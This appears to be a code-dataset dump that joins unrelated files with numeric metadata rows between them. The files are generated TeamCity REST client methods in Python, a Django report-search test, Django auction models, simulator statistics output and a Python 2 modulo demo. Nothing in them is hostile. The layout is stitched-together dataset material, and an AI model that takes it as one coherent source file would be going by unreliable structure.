all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_value_long" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_parameter_value_long`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_value_long`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}/value', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameter_value_long_0_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_value_long_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameter_value_long_0_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameter_value_long_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_parameter_value_long_0`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameter_value_long_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings/{name}/value', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameters_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""set_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameters_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param Properties body:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameters" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameters`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Properties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_parameters_0_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""set_parameters_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_parameters_0_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param Properties body:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_parameters_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_parameters_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Properties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_templates_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""set_templates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_templates_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param BuildTypes body:
:param bool optimize_settings:
:param str fields:
:return: BuildTypes
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'optimize_settings', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_templates" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_templates`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'optimize_settings' in params:
query_params.append(('optimizeSettings', params['optimize_settings'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/templates', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BuildTypes', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __set_vcs_labeling_options_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""set_vcs_labeling_options # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__set_vcs_labeling_options_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param VcsLabeling body:
:return: VcsLabeling
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_vcs_labeling_options" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `set_vcs_labeling_options`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcsLabeling', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VcsLabeling', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __update_vcs_root_entry_with_http_info(self, bt_locator, vcs_root_locator, **kwargs):  # noqa: E501
    """update_vcs_root_entry  # noqa: E501

    Synchronous by default; pass async_req=True to get a request thread
    back instead (call .get() on it for the result).

    :param async_req bool
    :param str bt_locator: (required)
    :param str vcs_root_locator: (required)
    :param VcsRootEntry body:
    :param str fields:
    :return: VcsRootEntry
        If the method is called asynchronously, returns the request thread.
    """
    recognised = ('bt_locator', 'vcs_root_locator', 'body', 'fields',
                  'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout')
    # Reject any keyword the generated API does not know about.
    for kw in kwargs:
        if kw not in recognised:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_vcs_root_entry" % kw
            )
    # Required positional locators must not be None.
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `update_vcs_root_entry`")  # noqa: E501
    if vcs_root_locator is None:
        raise ValueError("Missing the required parameter `vcs_root_locator` when calling `update_vcs_root_entry`")  # noqa: E501

    # TeamCityObject wrappers expose their locator string via .locator_id;
    # plain values are used as-is.
    path_params = {}
    for value, placeholder in ((bt_locator, 'btLocator'),
                               (vcs_root_locator, 'vcsRootLocator')):
        if isinstance(value, TeamCityObject):
            path_params[placeholder] = value.locator_id
        else:
            path_params[placeholder] = value

    query_params = []
    if 'fields' in kwargs:
        query_params.append(('fields', kwargs['fields']))  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs-root-entries/{vcsRootLocator}', 'PUT',
        path_params,
        query_params,
        {},  # header_params
        body=kwargs.get('body'),
        post_params=[],   # form_params
        files={},         # local_var_files
        response_type='VcsRootEntry',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __update_vcs_root_entry_checkout_rules_with_http_info(self, bt_locator, vcs_root_locator, **kwargs):  # noqa: E501
    """update_vcs_root_entry_checkout_rules  # noqa: E501

    Synchronous by default; pass async_req=True to get a request thread
    back instead (call .get() on it for the result).

    :param async_req bool
    :param str bt_locator: (required)
    :param str vcs_root_locator: (required)
    :param str body:
    :return: str
        If the method is called asynchronously, returns the request thread.
    """
    recognised = ('bt_locator', 'vcs_root_locator', 'body',
                  'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout')
    # Reject any keyword the generated API does not know about.
    for kw in kwargs:
        if kw not in recognised:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_vcs_root_entry_checkout_rules" % kw
            )
    # Required positional locators must not be None.
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `update_vcs_root_entry_checkout_rules`")  # noqa: E501
    if vcs_root_locator is None:
        raise ValueError("Missing the required parameter `vcs_root_locator` when calling `update_vcs_root_entry_checkout_rules`")  # noqa: E501

    def _as_locator(value):
        # TeamCityObject wrappers expose their locator string via .locator_id.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {
        'btLocator': _as_locator(bt_locator),
        'vcsRootLocator': _as_locator(vcs_root_locator),
    }

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs-root-entries/{vcsRootLocator}/checkout-rules', 'PUT',
        path_params,
        [],   # query_params
        {},   # header_params
        body=kwargs.get('body'),
        post_params=[],   # form_params
        files={},         # local_var_files
        response_type='str',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
| 41.385445
| 224
| 0.608317
| 57,847
| 510,655
| 5.075648
| 0.00484
| 0.059926
| 0.028354
| 0.028691
| 0.992258
| 0.990743
| 0.98999
| 0.986843
| 0.984694
| 0.982916
| 0
| 0.013987
| 0.298419
| 510,655
| 12,338
| 225
| 41.388799
| 0.805547
| 0.27479
| 0
| 0.840966
| 1
| 0
| 0.213864
| 0.055739
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032612
| false
| 0
| 0.004718
| 0
| 0.086317
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
455199a498d300b4645fc0b3734da54bee4fb8c0
| 4,026
|
py
|
Python
|
NippoKun/report/tests/test_search.py
|
KIKUYA-Takumi/Nippokun
|
aa82f97aaf5b61d94b213425f28314a248914eb9
|
[
"MIT"
] | null | null | null |
NippoKun/report/tests/test_search.py
|
KIKUYA-Takumi/Nippokun
|
aa82f97aaf5b61d94b213425f28314a248914eb9
|
[
"MIT"
] | 4
|
2016-10-19T00:23:21.000Z
|
2016-11-04T01:29:08.000Z
|
NippoKun/report/tests/test_search.py
|
KIKUYA-Takumi/NippoKun
|
aa82f97aaf5b61d94b213425f28314a248914eb9
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.models import User
from django.db.models import Q
from django.test import TestCase, Client, RequestFactory
from ..models import Report
# Create your tests here.
class SearchTest(TestCase):
    """Exercise keyword search over Report.report_content.

    setUp registers and logs in user 'john', then creates two reports
    whose contents are 'test' and 'search' respectively.
    """

    def setUp(self):
        self.client = Client()
        self.client.post('/report/user_register/',
                         {'username': 'john',
                          'password1': 'johnpass',
                          'password2': 'johnpass'})
        self.client.login(username='john', password='johnpass')
        request_factory = RequestFactory()
        self.request = request_factory.get('/report/mypage/')
        self.request.user = User.objects.get(pk=1)
        self.client.post('/report/report_entries/',
                         {'report_author': self.request.user,
                          'report_title': 'test title',
                          'report_content': 'test'})
        self.client.post('/report/report_entries/',
                         {'report_author': self.request.user,
                          'report_title': 'search test',
                          'report_content': 'search'})

    def _matching_reports(self, query):
        """Run one contains-filter per whitespace-separated word.

        A report matching several words is counted once per word,
        mirroring how the original tests accumulated matches.
        """
        matches = []
        for word in query.split():
            matches += Report.objects.filter(Q(report_content__contains=word))
        return matches

    def test_search_one_word(self):
        self.assertEqual(len(self._matching_reports('search')), 1)

    def test_search_many_words(self):
        self.assertEqual(len(self._matching_reports('test search')), 2)

    def test_search_no_hit_word(self):
        self.assertEqual(len(self._matching_reports('python')), 0)
class SearchReportsTest(TestCase):
    """Search across three reports, two of which contain 'search'."""

    def setUp(self):
        # Register and log in 'john', then create three reports; the
        # second and third both contain the word 'search'.
        self.client = Client()
        self.client.post('/report/user_register/',
                         {'username': 'john',
                          'password1': 'johnpass',
                          'password2': 'johnpass'})
        self.client.login(username='john', password='johnpass')
        request_factory = RequestFactory()
        self.request = request_factory.get('/report/mypage/')
        self.request.user = User.objects.get(pk=1)
        self.client.post('/report/report_entries/',
                         {'report_author': self.request.user,
                          'report_title': 'test title',
                          'report_content': 'test'})
        self.client.post('/report/report_entries/',
                         {'report_author': self.request.user,
                          'report_title': 'search test',
                          'report_content': 'search'})
        self.client.post('/report/report_entries/',
                         {'report_author': self.request.user,
                          'report_title': 'search ',
                          'report_content': 'This is search '})

    # status_code = 302: created new score.
    # status_code = 200: not create new score.
    def test_search(self):
        """'search' matches exactly the two reports that contain it."""
        matches = []
        for word in 'search'.split():
            matches += Report.objects.filter(Q(report_content__contains=word))
        self.assertEqual(len(matches), 2)
| 39.470588
| 96
| 0.55539
| 404
| 4,026
| 5.309406
| 0.188119
| 0.061538
| 0.055944
| 0.065268
| 0.82704
| 0.814452
| 0.814452
| 0.814452
| 0.814452
| 0.814452
| 0
| 0.005946
| 0.331595
| 4,026
| 101
| 97
| 39.861386
| 0.791156
| 0.005713
| 0
| 0.807229
| 0
| 0
| 0.157381
| 0.040822
| 0
| 0
| 0
| 0
| 0.048193
| 1
| 0.072289
| false
| 0.072289
| 0.048193
| 0
| 0.144578
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
4556262c411e8756d43acd6b2df49f6184b42cab
| 101
|
py
|
Python
|
veriloggen/fsm/__init__.py
|
akmaru/veriloggen
|
74f998139e8cf613f7703fa4cffd571bbf069bbc
|
[
"Apache-2.0"
] | 232
|
2015-09-01T16:07:48.000Z
|
2022-03-28T14:53:28.000Z
|
veriloggen/fsm/__init__.py
|
akmaru/veriloggen
|
74f998139e8cf613f7703fa4cffd571bbf069bbc
|
[
"Apache-2.0"
] | 34
|
2015-08-21T09:13:03.000Z
|
2022-03-21T23:52:44.000Z
|
veriloggen/fsm/__init__.py
|
akmaru/veriloggen
|
74f998139e8cf613f7703fa4cffd571bbf069bbc
|
[
"Apache-2.0"
] | 46
|
2015-09-24T14:39:57.000Z
|
2022-02-23T21:59:56.000Z
|
from __future__ import absolute_import
from __future__ import print_function
from .fsm import reset
| 20.2
| 38
| 0.861386
| 14
| 101
| 5.5
| 0.571429
| 0.25974
| 0.415584
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128713
| 101
| 4
| 39
| 25.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
455ab043ca617ad4f4b606687e9a9fc210b24170
| 578
|
py
|
Python
|
src/sst/elements/simpleElementExample/tests/subcomponent_tests/legacy/refFiles/test_sc_legacy_2nn.py
|
Xiaoyang-Lu/sst-elements
|
7946241e9f5a57a0bfdbfbf8452deacb1c3a9051
|
[
"BSD-3-Clause"
] | null | null | null |
src/sst/elements/simpleElementExample/tests/subcomponent_tests/legacy/refFiles/test_sc_legacy_2nn.py
|
Xiaoyang-Lu/sst-elements
|
7946241e9f5a57a0bfdbfbf8452deacb1c3a9051
|
[
"BSD-3-Clause"
] | null | null | null |
src/sst/elements/simpleElementExample/tests/subcomponent_tests/legacy/refFiles/test_sc_legacy_2nn.py
|
Xiaoyang-Lu/sst-elements
|
7946241e9f5a57a0bfdbfbf8452deacb1c3a9051
|
[
"BSD-3-Clause"
] | null | null | null |
Loader0:mySubComp[0]:mySubCompSlot.numSent : Accumulator : Sum.u32 = 15; SumSQ.u32 = 15; Count.u64 = 15; Min.u32 = 1; Max.u32 = 1;
Loader0:mySubComp[1]:mySubCompSlot.numSent : Accumulator : Sum.u32 = 15; SumSQ.u32 = 15; Count.u64 = 15; Min.u32 = 1; Max.u32 = 1;
Loader1:mySubComp[0]:mySubCompSlot.numRecv : Accumulator : Sum.u32 = 15; SumSQ.u32 = 15; Count.u64 = 15; Min.u32 = 1; Max.u32 = 1;
Loader1:mySubComp[1]:mySubCompSlot.numRecv : Accumulator : Sum.u32 = 15; SumSQ.u32 = 15; Count.u64 = 15; Min.u32 = 1; Max.u32 = 1;
Simulation is complete, simulated time: 10 us
| 96.333333
| 132
| 0.686851
| 91
| 578
| 4.362637
| 0.263736
| 0.100756
| 0.171285
| 0.191436
| 0.816121
| 0.816121
| 0.816121
| 0.816121
| 0.816121
| 0.816121
| 0
| 0.168378
| 0.157439
| 578
| 5
| 133
| 115.6
| 0.646817
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
455ba300299cb8323b6985bbd61fc9385993e6e9
| 4,434
|
py
|
Python
|
auctions/models.py
|
mmanchev23/commerce
|
43d8a598b0032f1c21142ecd4c497aab0e61992e
|
[
"MIT"
] | 1
|
2021-07-18T20:44:14.000Z
|
2021-07-18T20:44:14.000Z
|
auctions/models.py
|
mmanchev23/commerce
|
43d8a598b0032f1c21142ecd4c497aab0e61992e
|
[
"MIT"
] | null | null | null |
auctions/models.py
|
mmanchev23/commerce
|
43d8a598b0032f1c21142ecd4c497aab0e61992e
|
[
"MIT"
] | null | null | null |
import uuid
from decimal import Decimal
from django.db import models
from django.contrib.auth.models import AbstractUser
from django.core.validators import MinValueValidator
class User(AbstractUser):
    """Site user; extends Django's AbstractUser with a UUID primary key."""

    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)

    def __str__(self):
        """Display a user by username."""
        return str(self.username)
class Listing(models.Model):
    """An auction listing: title, description, price, category and image."""

    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    user = models.ForeignKey(User, on_delete=models.CASCADE, default=None, null=True, blank=True)
    title = models.CharField(max_length=100)
    description = models.TextField()
    # Price may not go below 0.00 (enforced by the validator).
    price = models.DecimalField(max_digits=10, decimal_places=2, validators=[MinValueValidator(Decimal('0.00'))])
    category = models.CharField(max_length=100)
    image = models.ImageField(null=True, blank=True, default='default_auction_image.jpg', upload_to='images/')
    created_at = models.DateTimeField(auto_now_add=True, editable=False)
    updated_at = models.DateTimeField(auto_now=True, editable=False)

    def __str__(self):
        """Display a listing by its title."""
        return str(self.title)

    @property
    def imageURL(self):
        """URL of the attached image, or the default image path if none."""
        if self.image:
            return self.image.url
        else:
            return "images/default_auction_image.jpg"
class Bid(models.Model):
    """A user's monetary bid on a listing."""

    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    user = models.ForeignKey(User, on_delete=models.CASCADE, default=None, null=True, blank=True)
    listing = models.ForeignKey(Listing, on_delete=models.CASCADE, default=None, null=True, blank=True)
    title = models.CharField(max_length=100)
    # Bid amount may not go below 0.00 (enforced by the validator).
    bid = models.DecimalField(max_digits=10, decimal_places=2, validators=[MinValueValidator(Decimal('0.00'))])
    created_at = models.DateTimeField(auto_now_add=True, editable=False)
    updated_at = models.DateTimeField(auto_now=True, editable=False)

    def __str__(self):
        """Display a bid by its title."""
        return str(self.title)
class Comment(models.Model):
    """A user comment attached to a listing."""

    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    user = models.ForeignKey(User, on_delete=models.CASCADE, default=None, null=True, blank=True)
    listing = models.ForeignKey(Listing, on_delete=models.CASCADE, default=None, null=True, blank=True)
    comment = models.TextField()
    created_at = models.DateTimeField(auto_now_add=True, editable=False)
    updated_at = models.DateTimeField(auto_now=True, editable=False)

    def __str__(self):
        """Display a comment by its text."""
        return str(self.comment)
class Watchlist(models.Model):
    """Marks a listing as watched by a user (one row per user/listing pair)."""

    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    user = models.ForeignKey(User, on_delete=models.CASCADE, default=None, null=True, blank=True)
    listing = models.ForeignKey(Listing, on_delete=models.CASCADE, default=None, null=True, blank=True)
    created_at = models.DateTimeField(auto_now_add=True, editable=False)
    updated_at = models.DateTimeField(auto_now=True, editable=False)

    def __str__(self):
        """Display a watchlist entry by its UUID."""
        return str(self.id)
class ClosedBid(models.Model):
    """Outcome of a closed auction: winner's name and winning price."""

    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    user = models.ForeignKey(User, on_delete=models.CASCADE, default=None, null=True, blank=True)
    winner = models.CharField(max_length=100)
    listing = models.ForeignKey(Listing, on_delete=models.CASCADE, default=None, null=True, blank=True)
    # Winning price may not go below 0.00 (enforced by the validator).
    winprice = models.DecimalField(max_digits=10, decimal_places=2, validators=[MinValueValidator(Decimal('0.00'))])
    created_at = models.DateTimeField(auto_now_add=True, editable=False)
    updated_at = models.DateTimeField(auto_now=True, editable=False)

    def __str__(self):
        """Display a closed bid by its UUID."""
        return str(self.id)
class AllListing(models.Model):
    """A denormalized copy of listing data (title/description/image).

    NOTE(review): duplicates fields and the imageURL property from
    Listing — confirm against the views whether this table is still needed.
    """

    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    listing = models.ForeignKey(Listing, on_delete=models.CASCADE, default=None, null=True, blank=True)
    title = models.CharField(max_length=100)
    description = models.TextField()
    image = models.ImageField(null=True, blank=True, default='default_auction_image.jpg', upload_to='images/')
    created_at = models.DateTimeField(auto_now_add=True, editable=False)
    updated_at = models.DateTimeField(auto_now=True, editable=False)

    def __str__(self):
        """Display an entry by its title."""
        return str(self.title)

    @property
    def imageURL(self):
        """URL of the attached image, or the default image path if none."""
        if self.image:
            return self.image.url
        else:
            return "images/default_auction_image.jpg"
| 42.634615
| 116
| 0.736355
| 579
| 4,434
| 5.47323
| 0.139896
| 0.077943
| 0.049227
| 0.064374
| 0.903124
| 0.886084
| 0.878826
| 0.878826
| 0.878826
| 0.878826
| 0
| 0.010596
| 0.148624
| 4,434
| 103
| 117
| 43.048544
| 0.828874
| 0
| 0
| 0.740741
| 0
| 0
| 0.031574
| 0.02571
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0.012346
| 0.061728
| 0.08642
| 0.91358
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
45b4e8a5ad5895c2b7f9ac5e3698d7e41016cd77
| 882
|
py
|
Python
|
test/run/t458.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
test/run/t458.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
test/run/t458.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
# Python 2 test script: prints the modulo operator's result for int and
# float operands in every sign combination, first against divisor 10 and
# then against -10 (in Python, the sign of `%` follows the divisor).
print "0 % 10 =", 0 % 10
print "3 % 10 =", 3 % 10
print "6 % 10 =", 6 % 10
print "10 % 10 =", 10 % 10
print "14 % 10 =", 14 % 10
print "-3 % 10 =", -3 % 10
